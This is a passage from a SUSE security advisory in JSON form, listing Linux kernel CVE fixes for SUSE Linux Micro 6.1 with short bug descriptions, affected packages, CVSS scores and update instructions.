[irdma]\n notifier_call_chain+0x9e/0x180\n atomic_notifier_call_chain+0x5c/0x110\n rt6_do_redirect+0xb91/0x1080\n tcp_v6_err+0xe9b/0x13e0\n icmpv6_notify+0x2b2/0x630\n ndisc_redirect_rcv+0x328/0x530\n icmpv6_rcv+0xc16/0x1360\n ip6_protocol_deliver_rcu+0xb84/0x12e0\n ip6_input_finish+0x117/0x240\n ip6_input+0xc4/0x370\n ipv6_rcv+0x420/0x7d0\n __netif_receive_skb_one_core+0x118/0x1b0\n process_backlog+0xd1/0x5d0\n __napi_poll.constprop.0+0xa3/0x440\n net_rx_action+0x78a/0xba0\n handle_softirqs+0x2d4/0x9c0\n do_softirq+0xad/0xe0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71133",
"url": "https://www.suse.com/security/cve/CVE-2025-71133"
},
{
"category": "external",
"summary": "SUSE Bug 1256733 for CVE-2025-71133",
"url": "https://bugzilla.suse.com/1256733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71133"
},
{
"cve": "CVE-2025-71135",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71135"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt()\n\nThe variable mddev-\u003eprivate is first assigned to conf and then checked:\n\n conf = mddev-\u003eprivate;\n if (!conf) ...\n\nIf conf is NULL, then mddev-\u003eprivate is also NULL. In this case,\nnull-pointer dereferences can occur when calling raid5_quiesce():\n\n raid5_quiesce(mddev, true);\n raid5_quiesce(mddev, false);\n\nsince mddev-\u003eprivate is assigned to conf again in raid5_quiesce(), and conf\nis dereferenced in several places, for example:\n\n conf-\u003equiesce = 0;\n wake_up(\u0026conf-\u003ewait_for_quiescent);\n\nTo fix this issue, the function should unlock mddev and return before\ninvoking raid5_quiesce() when conf is NULL, following the existing pattern\nin raid5_change_consistency_policy().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71136"
},
{
"cve": "CVE-2025-71137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-pf: fix \"UBSAN: shift-out-of-bounds error\"\n\nThis patch ensures that the RX ring size (rx_pending) is not\nset below the permitted length. This avoids UBSAN\nshift-out-of-bounds errors when users passes small or zero\nring sizes via ethtool -G.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71137",
"url": "https://www.suse.com/security/cve/CVE-2025-71137"
},
{
"category": "external",
"summary": "SUSE Bug 1256760 for CVE-2025-71137",
"url": "https://bugzilla.suse.com/1256760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71137"
},
{
"cve": "CVE-2025-71138",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71138"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Add missing NULL pointer check for pingpong interface\n\nIt is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a\nsingle place the check is missing.\nAlso use convenient locals instead of phys_enc-\u003e* where available.\n\nPatchwork: https://patchwork.freedesktop.org/patch/693860/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
